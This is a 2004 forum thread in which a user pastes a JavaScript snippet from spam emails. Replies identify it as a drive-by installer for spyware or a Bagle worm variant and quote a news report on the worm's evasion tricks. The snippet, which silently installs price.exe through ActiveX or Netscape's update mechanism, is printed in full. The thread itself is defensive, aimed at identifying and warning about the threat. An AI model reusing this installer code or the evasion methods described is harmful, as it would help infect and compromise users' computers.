0
   

HTML Code

 
 
Reply Mon 9 Aug, 2004 01:35 pm
What does this do?

Code:<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
} else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}

install();

// -->
</script>
</head>


getting inundated with email that has this zipped with price.exe
  • Topic Stats
  • Top Replies
  • Link to this Topic
Type: Discussion • Score: 0 • Views: 804 • Replies: 6
No top replies

 
timberlandko
 
  1  
Reply Mon 9 Aug, 2004 01:46 pm
That's a sneaky javascript installer for a nasty bit of yuckware known as BargainBuddy.

Trust me; you don't want it.
0 Replies
 
ebrown p
 
  1  
Reply Mon 9 Aug, 2004 01:47 pm
If you read this html with a browser, it will attempt to run price.exe on your computer. It has code specific to both Netscape and IE that makes "price.exe" look like a legitmate update.

This looks like spyware to me, although I didn't find any specific information. It will doubtlessly install something on your computer.

You should delete these messages, block them, and run a spyware cleaning program on your system.
0 Replies
 
McGentrix
 
  1  
Reply Mon 9 Aug, 2004 02:00 pm
We've been smacked hard with it. At least 100+ new emails with this attachment.

I am hoping no one has opened it...
0 Replies
 
timberlandko
 
  1  
Reply Mon 9 Aug, 2004 03:32 pm
Worse than just yuckware, it seems, if there is a zipped file included with the email, it may by a variant of the Bagle Worm, and or the page to which the script will redirect your homepage may sureptitiously instale the Bagle variant. This seems to be spreading widely, thiugh the major security outfits seem to be on it. If your browser and Windows are fully updated (no need for XP SP2 ... just all sevurity and critical updates), you should be cool. Norto/Symantec, McAfee, Trend, Kaspersky, EZTrust, and Grisoftall with current data files seem to catch the worm, so an up-to-date antivirus is shown again to be a good thing to have.
0 Replies
 
timberlandko
 
  1  
Reply Mon 9 Aug, 2004 03:38 pm
Yup, its a definite extra baddie:
Quote:
New Bagle version spreading
Variant said to be harder to catch

By Paul Roberts, IDG News Service August 09, 2004

BOSTON - Antivirus and computer security companies warned Internet users about a new version of the Bagle e-mail worm that was spreading quickly on the Internet Monday.

The new worm goes by a number of different names and is very similar to earlier versions of the worm, but also has new features that allow it to trick antivirus software and content filtering products, said Sam Curry, vice president of e-Trust Security Management at Computer Associates International Inc. (CA).

Antivirus company McAfee Inc. and CA both rated the new version of Bagle a "medium" threat, citing increasing number of samples submitted by customers.

CA first detected the new Bagle, which it dubbed Bagle.AG, around 9:00 a.m. Monday, Eastern Time in the United States. The new worm may have been "seeded" through e-mail distribution akin to unsolicited commercial ("spam") e-mail campaigns, said antivirus company F-Secure Corp. of Helsinki on Monday. F-Secure, like McAfee, labeled the new worm Bagle.AQ. (See: http://vil.nai.com/vil/content/v_127423.htm.)

Submissions from CA customers accelerated on Monday afternoon, with more than 35 enterprises and 300 consumers submitting samples of the worm to CA of Islandia, New York.

The new version of Bagle is nearly identical to earlier versions of Bagle. Like earlier Bagle versions, it contains its own Simple Mail Transfer Protocol (SMTP) e-mail engine, gleans e-mail addresses from files stored on the hard drive of computers it infects and sends copies of itself out to those addresses using forged (or "spoofed") sender addresses.

However, the new variant also has some new features that make it harder to catch, Curry said.

Among other things, the new worm injects a file known as a dynamic link library, or DLL, into Windows that allows the worm to disguise itself as the Microsoft Corp. Internet Explorer Web browser. That allows Bagle to masquerade its actions as those of IE, fooling firewall software that may be running on machines it infects and that would block communications to other systems on the Internet from unauthorized applications. As a result, the new Bagle version is able to request and download malicious files with impunity, he said.

For companies that may use content blocking products that inspect Web traffic, the new Bagle variant also has a feature that alters the names of files it requests in transit. For example, it can rename EXE program files as innocuous files such as JPG images, which content filtering products typically allow. Once downloaded to the infected system, however, the new Bagle version renames and runs the EXE files, he said.

CA is still analyzing Bagle, but Curry believes that the new worm version is spreading, in part, by exploiting a vulnerability in a Windows feature for viewing and opening ZIP compressed file archives. That vulnerability allows the worm to be installed if users simply view the ZIP-format e-mail attachment containing the worm file using the Windows Explorer or Internet Explorer browser.

CA and others have released updated virus definitions, or "signatures," that spot the new variant, Curry said. In addition, antivirus products that use heuristic technology to spot viruses may be able to spot the new variant without an updated virus signature, he said.
0 Replies
 
McGentrix
 
  1  
Reply Mon 9 Aug, 2004 03:44 pm
Thanks!
0 Replies
 
 

Related Topics

Clone of Micosoft Office - Question by Advocate
Do You Turn Off Your Computer at Night? - Discussion by Phoenix32890
The "Death" of the Computer Mouse - Discussion by Phoenix32890
Windows 10... - Discussion by Region Philbis
Surface Pro 3: What do you think? - Question by neologist
Windows 8 tips thread - Discussion by Wilso
GOOGLE CHROME - Question by Setanta
.Net and Firefox... - Discussion by gungasnake
Hacking a computer and remote access - Discussion by trying2learn
 
  1. Forums
  2. » HTML Code
Copyright © 2021 MadLab, LLC :: Terms of Service :: Privacy Policy :: Page generated in 0.04 seconds on 10/16/2021 at 04:27:50